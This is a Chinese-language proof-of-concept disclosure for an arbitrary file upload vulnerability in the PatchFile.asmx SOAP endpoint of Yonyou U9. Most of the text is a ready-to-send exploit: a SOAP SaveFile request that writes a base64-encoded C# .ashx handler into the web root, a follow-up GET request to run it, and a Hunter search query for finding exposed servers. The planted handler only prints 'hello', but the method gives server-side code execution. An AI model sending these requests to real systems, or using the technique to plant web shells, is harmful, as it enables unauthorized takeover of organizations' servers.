用友U9 patchfile存在任意文件上传漏洞
一、漏洞简介
用友U9秉承互联网基因,是全球第一款基于SOA云架构的多组织企业互联网应用平台。U9以精细化管理、产业链协协同与社交化商业,帮助多组织企业(多事业部/多地点/多工厂/多法人)在互联网时代实现商业模式创新、组织变革与管理升级。用友U9 patchfile存在任意文件上传漏洞,攻击者可通过该漏洞获取服务器权限。
二、影响版本
- 用友U9
三、资产测绘
- Hunter:
web.body="logo-u9.png" - 特征
四、漏洞复现
POST /CS/Office/AutoUpdates/PatchFile.asmx HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64)
Content-Length: 885
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/SaveFile"
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<SaveFile xmlns="http://tempuri.org/">
<binData>PCUgQCB3ZWJoYW5kbGVyIGxhbmd1YWdlPSJDIyIgY2xhc3M9IkF2ZXJhZ2VIYW5kbGVyIiAlPiAKdXNpbmcgU3lzdGVtOyAKdXNpbmcgU3lzdGVtLldlYjsgCgpwdWJsaWMgY2xhc3MgQXZlcmFnZUhhbmRsZXIgOiBJSHR0cEhhbmRsZXIgCnsgCiAgICBwdWJsaWMgYm9vbCBJc1JldXNhYmxlIAogICAgeyAKICAgICAgICBnZXQgewogICAgICAgICAgICAgcmV0dXJuIHRydWU7IAogICAgICAgICAgICB9IAogICAgICAgIH0gCiAgICAgICAgcHVibGljIHZvaWQgUHJvY2Vzc1JlcXVlc3QoSHR0cENvbnRleHQgY3R4KSAKICAgICAgICB7IAogICAgICAgICAgICBjdHguUmVzcG9uc2UuV3JpdGUoImhlbGxvIik7IAogICAgICAgIH0gCiAgICB9</binData>
<path>./</path>
<fileName>test.ashx</fileName>
</SaveFile>
</soap:Body>
</soap:Envelope>
上传文件位置
GET /CS/Office/AutoUpdates/test.ashx HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36
Connection: close
Cookie: .ASPXANONYMOUS=COEq2gdm3AEkAAAANjJmNWE5MWUtMjU1ZC00NzdjLTkxNTEtNDM5OWRjOWE1Nzc20; ASP.NET_SessionId=3wzfeojwxqywily1b4t1mqk0
Accept-Encoding: gzip, deflate
